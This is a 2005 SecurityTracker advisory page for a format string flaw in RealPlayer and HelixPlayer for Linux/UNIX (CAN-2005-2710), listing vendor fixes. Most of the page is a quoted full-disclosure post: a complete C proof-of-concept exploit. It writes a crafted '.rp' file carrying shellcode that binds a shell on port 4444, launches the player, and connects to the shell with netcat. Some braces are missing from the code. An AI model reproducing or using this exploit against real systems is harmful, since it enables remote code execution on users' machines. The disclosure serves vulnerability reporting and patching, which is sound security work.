RealPlayer for Linux/UNIX Format String Bug Lets Remote Users Execute Arbitrary Code
|
|
SecurityTracker Alert ID: 1014974
|
|
SecurityTracker URL: http://securitytracker.com/id?1014974
|
|
CVE Reference: CAN-2005-2710
(Links to External Site)
|
Updated: Sep 27 2005
|
Original Entry Date: Sep 27 2005
|
Impact: Execution of arbitrary code via network, User access via network
|
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
|
Version(s): 10.0.5.756 Gold
|
Description: A vulnerability was reported in RealPlayer for Linux/UNIX. A remote user can cause arbitrary code to be executed on the target user's system.
A remote user can create a specially crafted '.rp' file that, when loaded by the target user, will trigger a format string flaw and
execute arbitrary code on the target user's system. The code will run with the privileges of the target user.
HelixPlayer is
also affected.
c0ntex reported this vulnerability.
|
Impact: A remote user can cause arbitrary code to be executed on the target user's system with the privileges of the target user.
|
Solution: The vendor has issued a fixed version (10.0.6), available at:
http://www.real.com/linux
Red Hat has issued a fix for Red Hat Enterprise Linux 3 and 4:
https://rhn.redhat.com/errata/RHSA-2005-762.html
|
Vendor URL: www.real.com/linux (Links to External Site)
|
Cause: Input validation error, State error
|
Underlying OS: Linux (Any), UNIX (Any)
|
Reported By: c0ntex <c0ntexb@gmail.com>
|
Message History:
This archive entry has one or more follow-up message(s) listed below.
|
Source Message Contents
|
Date: Mon, 26 Sep 2005 19:27:32 +0100
From: c0ntex <c0ntexb@gmail.com>
Subject: [Full-disclosure] RealPlayer && HelixPlayer Remote Format String
|
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define BUFFER 10000
#define EBPMSB 64105
#define HOST "localhost"
#define NETCAT "/bin/nc"
#define NOPS 0x90
#define STACKPOP 148
#define VULN "/usr/local/RealPlayer/realplay"
char filename[]="\x56\x59\x14\x82\x26\x08\x2e\x72\x70";
/* metasploit port binding shellcode = 4444 */
char hellcode[]="\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66"
"\x58\x99\x89\xe1\xcd\x80\x96\x43\x52"
"\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a"
"\x66\x58\x50\x51\x56\x89\xe1\xcd\x80"
"\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56"
"\x43\x89\xe1\xb0\x66\xcd\x80\x93\x6a"
"\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9"
"\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68"
"\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89"
"\xe1\xcd\x80";
int
filegen(char *shellcode)
FILE *rp;
printf("[-] Creating file [%s]\n", filename);
rp = fopen(filename, "w");
if(!rp) {
puts("[!] Could not fopen file!");
free(shellcode);
return(EXIT_FAILURE);
}
printf("[-] Using [%d] stack pops\n[-] Modifying EBP MSB with
value [%d]\n", STACKPOP, EBPMSB);
fprintf(rp,
"<imfl>\n"
"<head\n"
"duration=\"1:33.7\"\n"
"timeformat=\"dd:hh:mm:ss.xyz\"\n"
"preroll=\"1:33.7\"\n"
"bitrate=\"1337\"\n"
"width=\"69\"\n"
"height=\"69\"\n"
"aspect=\"\"\n"
"url=\"http://www.open-security.org\"/>\n"
"<image handle=\"%%.%du%%%d$hn\" name=\"findme%s\"/>
\n"
"<fadein start=\"0\" duration=\"0:01\" target=\"
2\"/>\n"
"</imfl>", EBPMSB, STACKPOP, shellcode);
fclose(rp);
free(shellcode); shellcode = NULL;
return(EXIT_SUCCESS);
int
main(int argc, char **argv)
char *shellcode = NULL;
puts("\nRemote format string exploit POC for UNIX RealPlayer &&
HelixPlayer");
puts("Code tested on Debian 3.1 against RealPlayer 10 Gold's
latest version");
puts("by c0ntex || c0ntexb@gmail.com || http://www.open-security.org\n");
shellcode = (char *)malloc(BUFFER);
if(!shellcode) {
puts("[!] Could not malloc");
return(EXIT_FAILURE);
}
memset(shellcode, NOPS, BUFFER);
memcpy(&shellcode[BUFFER-strlen(hellcode)], hellcode, strlen(hellcode));
shellcode[BUFFER] = '\0';
filegen(shellcode);
puts("[-] Completed creation of test file!\n[-] Executing
RealPlayer now...");
switch(fork()) {
case -1:
puts("[!] Could not fork off, bailing!");
return(EXIT_FAILURE);
case 0:
if(execl(VULN, "realplay", filename, NULL) <0) {
puts("[!] Could not execute realplayer... :(");
return(EXIT_FAILURE);
}
}
puts("[-] Connecting to shell in 10 seconds\n** YOU MIGHT HAVE TO
HIT RETURN ON REALPLAYER WINDOW **");
sleep(10);
if(execl(NETCAT, "nc", HOST, "4444", NULL) <0) {
puts("[!] Could not connect, check the core file!");
return(EXIT_FAILURE);
}
return(EXIT_SUCCESS);
--
regards
c0ntex
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
|
|
